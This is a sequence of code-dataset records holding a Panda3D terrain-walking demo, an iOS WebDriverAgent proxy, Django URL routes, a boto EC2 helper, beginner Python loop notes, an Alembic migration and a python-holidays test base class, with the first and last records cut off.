addTitle(\"Panda3D Tutorial: Yet Another Roaming Ralph (Walking on uneven terrain too)\")\n        self.inst1 = addInstructions(0.95, \"[ESC]: Quit\")\n        self.inst2 = addInstructions(0.90, \"[a]: Rotate Ralph Left\")\n        self.inst3 = addInstructions(0.85, \"[d]: Rotate Ralph Right\")\n        self.inst4 = addInstructions(0.80, \"[w]: Run Ralph Forward\")\n        self.inst5 = addInstructions(0.70, \"[Left Button]: move camera forwards\")\n        self.inst6 = addInstructions(0.65, \"[Right Button]: move camera backwards\")\n        self.loc_text = addTextField(0.45, \"[LOC]: \")\n        \n        # -------------------------------------------------------------------\n        # Set up the environment\n        \n        # GeoMipTerrain\n        self.terrain = myGeoMipTerrain('terrain', self.loader)\n        self.terrain.setHeightfield(Filename('../Models/land01-map.png'))\n\n        # Set terrain properties\n        self.terrain.setBlockSize(32)\n        self.terrain.setNear(10)\n        self.terrain.setFar(100)\n        self.terrain.setFocalPoint(self.cam)\n\n        # Store the root NodePath for convenience\n        root = self.terrain.getRoot()\n        root.reparentTo(self.render)\n        root.setSz(30) # z (up) scale\n\n        # Generate it.\n        self.terrain.generate()\n\n        # texture\n        # self.terrain.setMonoTexture()\n        self.terrain.setMultiTexture() \n        self.environ = self.terrain # make available for original ralph code below\n        \n        # water\n        self.water = WaterNode(self, 0, 0, 256, 256, self._water_level.getZ())\n        \n        # add some lighting\n        ambient = Vec4(0.34, 0.3, 0.3, 1)\n        direct = Vec4(0.74, 0.7, 0.7, 1)\n        \n        # ambient light\n        alight = AmbientLight('alight')\n        alight.setColor(ambient)\n        alnp = self.render.attachNewNode(alight)\n        self.render.setLight(alnp)\n        \n        # directional (\"the sun\")\n        dlight = DirectionalLight('dlight')\n        dlight.setColor(direct)\n        dlnp = self.render.attachNewNode(dlight)\n        dlnp.setHpr(0.7, 0.2, -0.2)\n        self.render.setLight(dlnp)\n        \n        # make waterlevel and lights available to the terrain shader\n        root.setShaderInput('lightvec', Vec4(0.7, 0.2, -0.2, 1))\n        root.setShaderInput('lightcolor', direct)\n        root.setShaderInput('ambientlight', ambient)\n        wl = 
self._water_level\n wl.setZ(wl.getZ() - 0.05) # add some leeway (gets rid of some mirroring artifacts)\n root.setShaderInput('waterlevel', self._water_level) \n \n # skybox\n self.skybox = self.loader.loadModel('skybox')\n # make big enough to cover whole terrain, else there'll be problems with the water reflections\n self.skybox.setScale(500)\n self.skybox.setBin('background', 1)\n self.skybox.setDepthWrite(0)\n self.skybox.setLightOff()\n self.skybox.reparentTo(self.render)\n \n\n # Create the main character, Ralph\n\n # ralphStartPos = self.environ.find(\"**/start_point\").getPos()\n ralphStartPosX = 100\n ralphStartPosY = 100 \n ralphStartPosZ = self.terrain.getElevation(ralphStartPosX, ralphStartPosY) * root.getSz()\n \n self.ralph = Actor(\"ralph\", {\"run\":\"ralph-run\", \"walk\":\"ralph-walk\"})\n self.ralph.reparentTo(self.render)\n self.ralph.setScale(.2)\n self.ralph.setPos(ralphStartPosX, ralphStartPosY, ralphStartPosZ)\n\n self.skybox.setPos(ralphStartPosX, ralphStartPosY, ralphStartPosZ)\n\n # Create a floater object. We use the \"floater\" as a temporary\n # variable in a variety of calculations.\n \n self.floater = NodePath(PandaNode(\"floater\"))\n self.floater.reparentTo(self.render)\n\n # Set the current viewing target for the mouse based controls\n self.focus = Vec3(ralphStartPosX, ralphStartPosY + 10, ralphStartPosZ + 2)\n self.heading = 180\n self.pitch = 0\n self.mousex = 0\n self.mousey = 0\n self.last = 0\n self.mousebtn = [0, 0, 0]\n\n # Accept the control keys for movement and rotation\n\n self.accept(\"escape\", sys.exit)\n self.accept(\"arrow_left\", self.setKey, [\"cam-left\", 1])\n self.accept(\"arrow_right\", self.setKey, [\"cam-right\", 1])\n self.accept(\"arrow_up\", self.setKey, [\"cam-up\", 1])\n self.accept(\"arrow_down\", self.setKey, [\"cam-down\", 1])\n self.accept(\"w\", self.setKey, [\"forward\", 1])\n self.accept(\"a\", self.setKey, [\"left\", 1])\n self.accept(\"d\", self.setKey, [\"right\", 1])\n \n self.accept(\"arrow_left-up\", self.setKey, [\"cam-left\", 0])\n self.accept(\"arrow_right-up\", self.setKey, [\"cam-right\", 0])\n self.accept(\"arrow_up-up\", self.setKey, [\"cam-up\", 0])\n self.accept(\"arrow_down-up\", self.setKey, [\"cam-down\", 0])\n self.accept(\"w-up\", self.setKey, [\"forward\", 0])\n self.accept(\"a-up\", self.setKey, [\"left\", 0])\n self.accept(\"d-up\", self.setKey, [\"right\", 0])\n\n # mouse controls\n self.accept(\"mouse1\", self.setMouseBtn, [0, 1])\n self.accept(\"mouse1-up\", self.setMouseBtn, [0, 0])\n self.accept(\"mouse2\", self.setMouseBtn, [1, 1])\n self.accept(\"mouse2-up\", self.setMouseBtn, [1, 0])\n self.accept(\"mouse3\", self.setMouseBtn, [2, 1])\n self.accept(\"mouse3-up\", self.setMouseBtn, [2, 0])\n\n # ---- tasks -------------------------------------\n # ralph movement\n self.taskMgr.add(self.move, \"moveTask\")\n # Add a task to keep updating the terrain\n self.taskMgr.add(self.terrain.update, \"update\")\n # mouse camera movement\n self.taskMgr.add(self.controlCamera, \"camera-task\")\n\n # Game state variables\n self.prevtime = 0\n self.isMoving = False\n\n # disable std. mouse\n self.disableMouse()\n props = WindowProperties()\n props.setCursorHidden(True)\n self.win.requestProperties(props)\n\n # Set up the camera\n self._setup_camera()\n self.camera.setPos(self.ralph.getX(), self.ralph.getY() + 10, 2)\n \n # We will detect the height of the terrain by creating a collision\n # ray and casting it downward toward the terrain. 
One ray will\n        # start above ralph's head, and the other will start above the camera.\n        # A ray may hit the terrain, or it may hit a rock or a tree.  If it\n        # hits the terrain, we can detect the height.  If it hits anything\n        # else, we rule that the move is illegal.\n\n        self.cTrav = CollisionTraverser()\n\n        self.ralphGroundRay = CollisionRay()\n        self.ralphGroundRay.setOrigin(0, 0, 1000)\n        self.ralphGroundRay.setDirection(0, 0, -1)\n        self.ralphGroundCol = CollisionNode('ralphRay')\n        self.ralphGroundCol.addSolid(self.ralphGroundRay)\n        self.ralphGroundCol.setFromCollideMask(BitMask32.bit(0))\n        self.ralphGroundCol.setIntoCollideMask(BitMask32.allOff())\n        self.ralphGroundColNp = self.ralph.attachNewNode(self.ralphGroundCol)\n        self.ralphGroundHandler = CollisionHandlerQueue()\n        self.cTrav.addCollider(self.ralphGroundColNp, self.ralphGroundHandler)\n\n        self.camGroundRay = CollisionRay()\n        self.camGroundRay.setOrigin(0, 0, 1000)\n        self.camGroundRay.setDirection(0, 0, -1)\n        self.camGroundCol = CollisionNode('camRay')\n        self.camGroundCol.addSolid(self.camGroundRay)\n        self.camGroundCol.setFromCollideMask(BitMask32.bit(0))\n        self.camGroundCol.setIntoCollideMask(BitMask32.allOff())\n        self.camGroundColNp = self.camera.attachNewNode(self.camGroundCol)\n        self.camGroundHandler = CollisionHandlerQueue()\n        self.cTrav.addCollider(self.camGroundColNp, self.camGroundHandler)\n\n        # Uncomment these lines to see the collision rays\n        # self.ralphGroundColNp.show()\n        # self.camGroundColNp.show()\n        \n        # Uncomment these lines to show a visual representation of the\n        # collisions occurring\n        # self.cTrav.showCollisions(render)\n        \n\n        \n    # Records the state of the arrow keys\n    def setKey(self, key, value):\n        self.keyMap[key] = value\n        \n\n    # Accepts arrow keys to move either the player or the menu cursor,\n    # Also deals with grid checking and collision detection\n    def move(self, task):\n\n        elapsed = task.time - self.prevtime\n\n        # If the camera-left key is pressed, move camera left.\n        # If the camera-right key is pressed, move camera right.\n\n        self.camera.lookAt(self.ralph)\n        camright = self.camera.getNetTransform().getMat().getRow3(0)\n        camright.normalize()\n        if (self.keyMap[\"cam-left\"] != 0):\n            self.camera.setPos(self.camera.getPos() - camright * (elapsed * 20))\n        if (self.keyMap[\"cam-right\"] != 0):\n            self.camera.setPos(self.camera.getPos() + camright * (elapsed * 20))\n        if (self.keyMap[\"cam-up\"] != 0):\n            self.camera.setZ(self.camera.getZ() + elapsed * 10)\n        if (self.keyMap[\"cam-down\"] != 0):\n            self.camera.setZ(self.camera.getZ() - elapsed * 10)\n\n        # save ralph's initial position so that we can restore it,\n        # in case he falls off the map or runs into something.\n\n        startpos = self.ralph.getPos()\n\n        # If a move-key is pressed, move ralph in the specified direction.\n\n        if (self.keyMap[\"left\"] != 0):\n            self.ralph.setH(self.ralph.getH() + elapsed * 300)\n        if (self.keyMap[\"right\"] != 0):\n            self.ralph.setH(self.ralph.getH() - elapsed * 300)\n        if (self.keyMap[\"forward\"] != 0):\n            backward = self.ralph.getNetTransform().getMat().getRow3(1)\n            backward.setZ(0)\n            backward.normalize()\n            self.ralph.setPos(self.ralph.getPos() - backward * (elapsed * 5))\n\n        # If ralph is moving, loop the run animation.\n        # If he is standing still, stop the animation.\n\n        if (self.keyMap[\"forward\"] != 0) or (self.keyMap[\"left\"] != 0) or (self.keyMap[\"right\"] != 0):\n            if self.isMoving is False:\n                self.ralph.loop(\"run\")\n                self.isMoving = True\n        else:\n            if self.isMoving:\n                self.ralph.stop()\n                self.ralph.pose(\"walk\", 5)\n                self.isMoving = False\n\n        # If the camera is too far from ralph, move it closer.\n        # If the camera is too close to ralph, move it farther.\n\n        camvec = self.ralph.getPos() - self.camera.getPos()\n        camvec.setZ(0)\n        camdist = camvec.length()\n        camvec.normalize()\n        if (camdist > 10.0):\n            self.camera.setPos(self.camera.getPos() + camvec * (camdist - 10))\n            camdist = 10.0\n        if (camdist < 5.0):\n            self.camera.setPos(self.camera.getPos() - camvec * (5 - camdist))\n            camdist = 5.0\n\n        # Now check for collisions.\n        '''\n        self.cTrav.traverse(render)\n\n        # Adjust ralph's Z coordinate.  If ralph's ray hit terrain,\n        # update his Z. If it hit anything else, or didn't hit anything, put\n        # him back where he was last frame.\n\n        entries = []\n        for i in range(self.ralphGroundHandler.getNumEntries()):\n            entry = self.ralphGroundHandler.getEntry(i)\n            entries.append(entry)\n        entries.sort(key=lambda e: e.getSurfacePoint(render).getZ(), reverse=True)\n        if (len(entries)>0) and (entries[0].getIntoNode().getName() == \"terrain\"):\n            self.ralph.setZ(entries[0].getSurfacePoint(render).getZ())\n        else:\n            self.ralph.setPos(startpos)\n        '''\n        \n        # just use terrain height\n        x = self.ralph.getX()\n        y = self.ralph.getY()\n        self.ralph.setZ(self.terrain.getElevation(x, y) * self.terrain.getRoot().getSz())\n        \n        # loc output\n        self.loc_text.setText('[LOC] : %03.2f, %03.2f, %03.2f ' % \\\n            (self.ralph.getX(), self.ralph.getY(), self.ralph.getZ()))\n        \n        \n        # Keep the camera at one foot above the terrain,\n        # or two feet above ralph, whichever is greater.\n        \n        entries = []\n        for i in range(self.camGroundHandler.getNumEntries()):\n            entry = self.camGroundHandler.getEntry(i)\n            entries.append(entry)\n        # sort the highest surface point first (Python 3: list.sort() takes a key function, not a cmp function)\n        entries.sort(key=lambda e: e.getSurfacePoint(self.render).getZ(), reverse=True)\n        if (len(entries) > 0) and (entries[0].getIntoNode().getName() == \"terrain\"):\n            self.camera.setZ(entries[0].getSurfacePoint(self.render).getZ() + .1)\n        if (self.camera.getZ() < self.ralph.getZ() + .5):\n            self.camera.setZ(self.ralph.getZ() + .5)\n        # if (base.camera.getZ() > self.ralph.getZ() + 2.0):\n        #     base.camera.setZ(self.ralph.getZ() + 2.0)\n        \n        # The camera should look in ralph's direction,\n        # but it should also try to stay horizontal, so look at\n        # a floater which hovers above ralph's head.\n        \n        self.floater.setPos(self.ralph.getPos())\n        self.floater.setZ(self.ralph.getZ() + 2.0)\n        self.camera.lookAt(self.floater)\n        \n        # Store the task time and continue.\n        self.prevtime = task.time\n        return Task.cont\n\n    # mouse controlled main camera\n    def controlCamera(self, task):\n        # figure out how much the mouse has moved (in pixels)\n        md = self.win.getPointer(0)\n        x = md.getX()\n        y = md.getY()\n        if self.win.movePointer(0, 100, 100):\n            self.heading = self.heading - (x - 100) * 0.2\n            self.pitch = self.pitch - (y - 100) * 0.2\n        if (self.pitch < -89): self.pitch = -89\n        if (self.pitch > 89): self.pitch = 89\n        self.camera.setHpr(self.heading, self.pitch, 0)\n        dir = self.camera.getMat().getRow3(1)\n        elapsed = task.time - self.last\n        if (self.last == 0): elapsed = 0\n        if (self.mousebtn[0]):\n            self.focus = self.focus + dir * elapsed * 30\n        if (self.mousebtn[1]) or (self.mousebtn[2]):\n            self.focus = self.focus - dir * elapsed * 30\n        self.camera.setPos(self.focus - (dir * 5))\n\n        # Time for water distortions\n        self.render.setShaderInput('time', task.time)\n\n        # move the skybox with the camera\n        campos = self.camera.getPos()\n        self.skybox.setPos(campos)\n\n        # update matrix of the reflection camera\n        mc = 
self.camera.getMat()\n mf = self.waterPlane.getReflectionMat()\n self.watercamNP.setMat(mc * mf)\n\n self.focus = self.camera.getPos() + (dir * 5)\n self.last = task.time\n return Task.cont\n\n\nif __name__ == '__main__':\n print('instancing world...')\n w = World()\n\n print('calling run()...')\n w.run()\n","sub_path":"contribs/Yarr.py","file_name":"Yarr.py","file_ext":"py","file_size_in_byte":22201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"61393997","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport requests\nimport six\nimport time\nimport json\nimport base64\nimport wda\nfrom deval.utils.cv import *\nfrom deval.component.ios.utils.constant import CAP_METHOD, TOUCH_METHOD, IME_METHOD\nfrom deval.component.ios.utils.rotation import XYTransformer, RotationWatcher\nfrom deval.component.ios.utils.fake_minitouch import fakeMiniTouch\nfrom deval.component.ios.utils.instruct_helper import InstructHelper\nfrom deval.utils.logger import get_logger\nfrom deval.utils.parse import parse_uri\nfrom wda import LANDSCAPE, PORTRAIT, LANDSCAPE_RIGHT, PORTRAIT_UPSIDEDOWN\nfrom wda import WDAError\nif six.PY3:\n from urllib.parse import urljoin\nelse:\n from urlparse import urljoin\n\n\nlogger = get_logger(__name__)\nDEFAULT_ADDR = \"http://localhost:8100/\"\n\n\n# retry when saved session failed\ndef retry_session(func):\n def wrapper(self, *args, **kwargs): \n try:\n return func(self, *args, **kwargs)\n except WDAError as err:\n # 6 : Session does not exist\n if err.status == 6:\n self._fetchNewSession()\n return func(self, *args, **kwargs)\n else:\n raise err\n return wrapper\n\n\ndef check_platform_ios(uri, platform=\"ios\"):\n \"\"\"\n Check the uri and return a dictionary containing the various parameters contained in the uri.\n\n Parameters:\n uri - an URI where to connect to device, e.g. 
`ios:///`\n\n    Returns:\n        A dictionary containing the various parameters contained in the uri.\n\n    Raises:\n        RuntimeError - raised when the platform does not match the uri.\n    \"\"\"\n    params = parse_uri(uri)\n    if params[\"platform\"] != platform:\n        raise RuntimeError(\"Platform error!\")\n    if \"uuid\" in params:\n        params[\"addr\"] = params[\"uuid\"]\n        params.pop(\"uuid\")\n    params.pop(\"platform\")\n    return params\n\n\n# copy from airtest\nclass IOSProxy(object):\n    \"\"\"ios client\n    # before this you have to run WebDriverAgent\n    # xcodebuild -project path/to/WebDriverAgent.xcodeproj -scheme WebDriverAgentRunner -destination \"id=$(idevice_id -l)\" test\n    # iproxy $port 8100 $udid\n    \"\"\"\n\n    def __init__(self, addr=DEFAULT_ADDR):\n        super(IOSProxy, self).__init__()\n\n        # if none or empty, use default addr\n        self.addr = addr or DEFAULT_ADDR\n\n        # fit wda format, make url start with http://\n        if not self.addr.startswith(\"http://\"):\n            self.addr = \"http://\" + addr\n\n        \"\"\"here now use these supported cap touch and ime method\"\"\"\n        self.cap_method = CAP_METHOD.WDACAP\n        self.touch_method = TOUCH_METHOD.WDATOUCH\n        self.ime_method = IME_METHOD.WDAIME\n\n        # wda driver, used to go home and start apps\n        # init wda session, updated when an app is started\n        # used to click/swipe/close app/get wda size\n        wda.DEBUG = False\n        self.driver = wda.Client(self.addr)\n\n        # record device's width\n        self._size = {'width': None, 'height': None}\n        self._touch_factor = 0.5\n        self._last_orientation = None\n        self.defaultSession = None\n\n        # start up RotationWatcher with default session\n        self.rotation_watcher = RotationWatcher(self)\n\n        # fake minitouch to simulate swipe\n        self.minitouch = fakeMiniTouch(self)\n\n        # helper of run process like iproxy\n        self.instruct_helper = InstructHelper()\n\n    @property\n    def session(self):\n        if not self.defaultSession:\n            self.defaultSession = self.driver.session()\n        return self.defaultSession\n\n    def _fetchNewSession(self):\n        self.defaultSession = self.driver.session()\n\n    @retry_session\n    def window_size(self):\n        \"\"\"\n        return window size\n        namedtuple:\n            Size(width, height)\n        \"\"\"\n        return self.session.window_size()\n\n    @property\n    @retry_session\n    def orientation(self):\n        \"\"\"\n        return device orientation status,\n        e.g. LANDSCAPE or PORTRAIT\n        \"\"\"\n        return self.session.orientation\n\n    @property\n    def display_info(self):\n        if not self._size['width'] or not self._size['height']:\n            self.snapshot()\n        return {'width': self._size['width'], 'height': self._size['height'], 'orientation': self.orientation, 'physical_width': self._size['width'], 'physical_height': self._size['height']}\n\n    def snapshot(self, filename=None, strType=False, ensure_orientation=True):\n        \"\"\"\n        take snapshot\n        filename: save screenshot to filename\n        \"\"\"\n        data = None\n\n        if self.cap_method == CAP_METHOD.MINICAP:\n            raise NotImplementedError\n        elif self.cap_method == CAP_METHOD.MINICAP_STREAM:\n            raise NotImplementedError\n        elif self.cap_method == CAP_METHOD.WDACAP:\n            data = self._neo_wda_screenshot()  # WDA screenshot; orientation is handled below\n\n        if strType:\n            if filename:\n                with open(filename, 'wb') as f:\n                    f.write(data)\n            return data\n\n        # output cv2 object\n        try:\n            screen = string_2_img(data)\n        except:\n            # may be black/locked screen or other reason, print exc for debugging\n            import traceback\n            traceback.print_exc()\n            return None\n\n        now_orientation = self.orientation\n\n        # ensure the orientation is right\n        if ensure_orientation and now_orientation in [LANDSCAPE, LANDSCAPE_RIGHT]:\n\n            # minicap screenshots are different for various sdk_version\n            if self.cap_method in (CAP_METHOD.MINICAP, CAP_METHOD.MINICAP_STREAM):\n                h, w = screen.shape[:2]  # cv2's shape puts the height first!\n                if w < h:  # currently landscape but the image is portrait, so rotate (for devices with sdk <= 16)\n                    screen = rotate(screen, self.display_info[\"orientation\"] * 90, clockwise=False)\n\n            # WDA screenshots must be rotated according to the orientation\n            elif self.cap_method == CAP_METHOD.WDACAP:\n                # seems need to rotate in opencv opencv-contrib-python==3.2.0.7\n                screen = rotate(screen, 90, clockwise=(now_orientation == LANDSCAPE_RIGHT))\n\n        # read screen size\n        h, w = screen.shape[:2]\n\n        # save last res for portrait\n        if now_orientation in [LANDSCAPE, LANDSCAPE_RIGHT]:\n            self._size['height'] = w\n            self._size['width'] = h\n        else:\n            self._size['height'] = h\n            self._size['width'] = w\n\n        winw, winh = self.window_size()\n\n        self._touch_factor = float(winh) / float(h)\n\n        # save as file if needed\n        if filename:\n            imwrite(filename, screen)\n\n        return screen\n\n    def _neo_wda_screenshot(self):\n        \"\"\"\n        this is almost same as wda implementation, but without png header check,\n        as response data is now jpg format in mid quality\n        \"\"\"\n        value = self.driver.http.get('screenshot').value\n        raw_value = base64.b64decode(value)\n        return raw_value\n\n    def _touch_point_by_orientation(self, tuple_xy):\n        \"\"\"\n        Convert image coordinates to physical display coordinates, the arbitrary point (origin) is upper left corner\n        of the device physical display\n\n        Args:\n            tuple_xy: image coordinates (x, y)\n\n        Returns:\n\n        \"\"\"\n        x, y = tuple_xy\n\n        # use correct w and h due to now orientation\n        # _size only holds the portrait width/height\n        now_orientation = self.orientation\n\n        if now_orientation in [PORTRAIT, PORTRAIT_UPSIDEDOWN]:\n            width, height = self._size['width'], self._size[\"height\"]\n        else:\n            height, width = self._size['width'], self._size[\"height\"]\n\n        # check whether the screen size has not been fetched yet when touching\n        if not width or not height:\n            # use snapshot to get the current resolution\n            self.snapshot()\n\n        x, y = XYTransformer.up_2_ori(\n            (x, y),\n            (width, height),\n            now_orientation\n        )\n        return x, y\n","sub_path":"deval/component/ios/utils/iosfuncs.py","file_name":"iosfuncs.py","file_ext":"py","file_size_in_byte":8176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"279929703","text":"from django.conf.urls import patterns, include, url\r\n\r\n# Uncomment the next two lines to enable the admin:\r\nfrom websites.content import views\r\nfrom django.contrib import admin\r\nadmin.autodiscover()\r\n\r\nfrom django.conf import settings\r\n\r\nurlpatterns = patterns('',\r\n    url(r'^admin/', include(admin.site.urls)),\r\n    url(r'^kustomz/$','websites.content.views.contact'),\r\n)\r\n\r\nif settings.REGISTER: \r\n    urlpatterns += patterns('',\r\n        url(r'^accounts/login/$','django.contrib.auth.views.login', {'template_name': 'login.html'}),\r\n        url(r'^accounts/logout/$','django.contrib.auth.views.logout',{'template_name':'logout.html'}),\r\n        url(r'^accounts/register/$','websites.content.views.register'), \r\n    )\r\n\r\nif settings.SHOPPING:\r\n    urlpatterns += patterns('',\r\n        url(r'^section/(?P\\w+)/$','websites.shopping.views.section'),\r\n        url(r'^detail/(?P\\d+)/$','websites.shopping.views.detail'),\r\n    )\r\n\r\nif settings.TWITTER: \r\n    urlpatterns += patterns('',\r\n        url(r'^authorize/', 'websites.content.views.authorize_twitter'),\r\n        url(r'^tlogin/','websites.content.views.twitter_login'),\r\n    )\r\n\r\nif settings.LANDING: \r\n    urlpatterns += patterns('', \r\n        url(r'^$', 'django.views.generic.simple.direct_to_template', {'template':'landing.html'}), \r\n        url(r'^home/$', 
views.index)\r\n    )\r\n\r\nelse: \r\n    urlpatterns += patterns('',\r\n        url(r'^$', views.index)\r\n    )\r\n\r\nif settings.DEBUG:\r\n    urlpatterns += patterns('',\r\n        (r'^assets/(?P.*)$', 'django.views.static.serve', {'document_root': \"/Users/ball6862/Github/Sites/django_apps/media/jakore/\", 'show_indexes':True}),\r\n)\r\n","sub_path":"django_apps/websites/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"274112072","text":"import re\n\nimport boto.ec2\nimport boto.vpc\nimport boto.route53\nimport boto.utils  # needed for get_instance_metadata() below\n\n\nclass EC2(object):\n\n    def __init__(self, environment, security_group):\n        self.environment = environment\n        self.security_group = security_group\n\n        instance_metadata = boto.utils.get_instance_metadata()\n\n        self.instance_id = instance_metadata['instance-id']\n        self.aws_zone = instance_metadata['placement']['availability-zone']\n        self.aws_region = re.sub(r'[ab]$', '', self.aws_zone)\n\n        self.ec2 = boto.ec2.connect_to_region(self.aws_region)\n        self.vpc = boto.vpc.connect_to_region(self.aws_region)\n        self.route53 = boto.route53.Route53Connection()\n","sub_path":"aws_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"325667774","text":"schedulers = []\n\nfrom buildbot.schedulers.basic import SingleBranchScheduler\nfrom buildbot.schedulers.forcesched import ForceScheduler, FixedParameter, StringParameter, ChoiceStringParameter\n\nfrom buildbot.schedulers.timed import Periodic\nfrom buildbot.schedulers.trysched import Try_Userpass\nfrom metabbotcfg.slaves import slaves\nfrom metabbotcfg import builders\n\nfrom metabbotcfg.debian import schedulers as deb_schedulers\n\nschedulers.append(SingleBranchScheduler(name=\"all\", branch='master',\n        treeStableTimer=10,\n        builderNames=[ b['name'] for b in builders.master_builders ]))\n\nschedulers.append(SingleBranchScheduler(name=\"release\", branch='buildbot-0.8.9',\n        treeStableTimer=10,\n        builderNames=[ b['name'] for b in builders.master_builders if b['name'] not in ('docs',) ]))\n\nschedulers.append(SingleBranchScheduler(name=\"nine\", branch='nine',\n        treeStableTimer=5,\n        builderNames=[ b['name'] for b in builders.nine_builders ]))\n\nschedulers.append(ForceScheduler(name=\"force\",\n    repository=FixedParameter(name=\"repository\", default='git://github.com/buildbot/buildbot.git'),\n    branch=ChoiceStringParameter(name=\"branch\", default=\"master\", choices=[\"master\", \"nine\"]),\n    project=FixedParameter(name=\"project\", default=\"\"),\n    properties=[],\n    builderNames=[ b['name'] for b in builders.master_builders ]))\n\nschedulers += deb_schedulers\n","sub_path":"schedulers.py","file_name":"schedulers.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"84359809","text":"\"\"\"s=\"python\"\r\nfor eleman in range(6):\r\n    if eleman % 2 == 0:\r\n        print(s[eleman])\"\"\"\r\n\r\n\"\"\"for i in \"python\"[::2]:\r\n    print(i,end=\" \")\"\"\"\r\n\r\n\r\n    #range function \r\n#usage\r\n#print(*range(0,10))\r\n\r\n#countdown\r\n#print(*range(20,0,-2))\r\n\r\n#---------------------------------------\r\n\r\n#list comprehension\r\n\r\n\"\"\"list1=[1,234,56]\r\n\r\nlist2=list()\r\n\r\nfor i in list1:\r\n    list2.append(i)\r\nprint(list2)\"\"\"\r\n\r\n\r\n\r\n#LIST COMPREHENSION \r\nlis5=[1,2,3,4,5]\r\nlist4= [i for i in lis5]\r\n#start reading the comprehension from the right\r\nprint(list4)\r\n\r\n\"\"\"liste1 = [1,2,3,4,5]\r\nliste2 = list(liste1)\r\n \r\nprint(liste2)\"\"\"\r\n#copying also works this way.\r\n\r\n\"\"\"\r\ns=\"java\"\r\nlist2= [i*3 for i in s]\r\n#append each element of s, repeated 3 times, to list2\r\nprint(list2)\"\"\"\r\n\r\n\r\n","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"417794383","text":"\"\"\"Add social fields\n\nRevision ID: 2c423286568f\nRevises: 1570277296f2\nCreate Date: 2020-09-16 12:45:33.692464\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '2c423286568f'\ndown_revision = '1570277296f2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('societies', sa.Column('socials', sa.JSON(), nullable=False, server_default=\"[]\"))\n    op.alter_column('societies', 'sessions',\n               existing_type=postgresql.JSON(astext_type=sa.Text()),\n               nullable=True,\n               existing_server_default=sa.text(\"'[]'::json\"))\n    op.drop_column('societies', 'social_2')\n    op.drop_column('societies', 'social_1')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('societies', sa.Column('social_1', sa.VARCHAR(), autoincrement=False, nullable=True))\n    op.add_column('societies', sa.Column('social_2', sa.VARCHAR(), autoincrement=False, nullable=True))\n    op.alter_column('societies', 'sessions',\n               existing_type=postgresql.JSON(astext_type=sa.Text()),\n               nullable=False,\n               existing_server_default=sa.text(\"'[]'::json\"))\n    op.drop_column('societies', 'socials')\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/2c423286568f_add_social_fields.py","file_name":"2c423286568f_add_social_fields.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"13465799","text":"# python-holidays\n# ---------------\n# A fast, efficient Python library for generating country, province and state\n# specific sets of holidays on the fly. 
It aims to make determining whether a\n# specific date is a holiday as fast and flexible as possible.\n#\n# Authors: dr-prodigy (c) 2017-2023\n# ryanss (c) 2014-2017\n# Website: https://github.com/dr-prodigy/python-holidays\n# License: MIT (see LICENSE file)\n\nimport unittest\nfrom typing import Generator\n\nfrom dateutil.parser import parse\n\nfrom holidays import HolidayBase\nfrom holidays.constants import SUN\n\n\nclass TestCase(unittest.TestCase):\n \"\"\"Base class for python-holiday test cases.\"\"\"\n\n def _parse_arguments(self, args, expand_items=True):\n item_args = args\n instance = None\n\n if issubclass(args[0].__class__, HolidayBase):\n instance = args[0]\n item_args = args[1:]\n else:\n try:\n instance = getattr(self, \"holidays\")\n self.assertTrue(\n issubclass(instance.__class__, HolidayBase),\n \"The `self.holidays` must be a `HolidayBase` subclass.\",\n )\n except AttributeError:\n raise ValueError(\n \"Either pass a holidays object (`HolidayBase` subclass) \"\n \"as a first argument or initialize `self.holidays` in the \"\n \"`setUp()` method.\"\n )\n\n items = []\n if expand_items:\n for item_arg in item_args:\n if type(item_arg) in {list, tuple}:\n items.extend(item_arg)\n elif expand_items and isinstance(item_arg, Generator):\n items.extend(tuple(item_arg))\n else:\n items.append(item_arg)\n else:\n items.extend(item_args)\n\n return instance, items\n\n def _verify_type(self, holidays):\n self.assertTrue(\n issubclass(holidays.__class__, HolidayBase),\n \"`holidays` object must be a subclass of `HolidayBase`\",\n )\n\n def assertCountryAliases(self, cls, alpha_2, alpha_3):\n \"\"\"Assert country aliases match.\"\"\"\n\n self.assertTrue(\n issubclass(cls, HolidayBase),\n \"Country holidays object must be a subclass of `HolidayBase`\",\n )\n\n type_error_message = (\n \"Country alias object must be a subclass of the country class.\"\n )\n for alias in (alpha_2, alpha_3):\n self.assertIsNotNone(alias, type_error_message)\n self.assertTrue(issubclass(alias, cls), type_error_message)\n\n length_error_message = (\n \"This method accepts exactly 3 arguments \"\n \"in this specific order: country base class, country alpha-2 \"\n \"alias, and country alpha-3 alias. For example: \"\n \"`self.assertCountryAliases(UnitedStates, US, USA)`\"\n )\n if len(alpha_2.__name__) != 2:\n raise ValueError(\n f\"{length_error_message}. Alias `{alpha_2.__name__}` doesn't \"\n \"look like alpha-2 country code.\"\n )\n\n if len(alpha_3.__name__) != 3:\n raise ValueError(\n f\"{length_error_message}. 
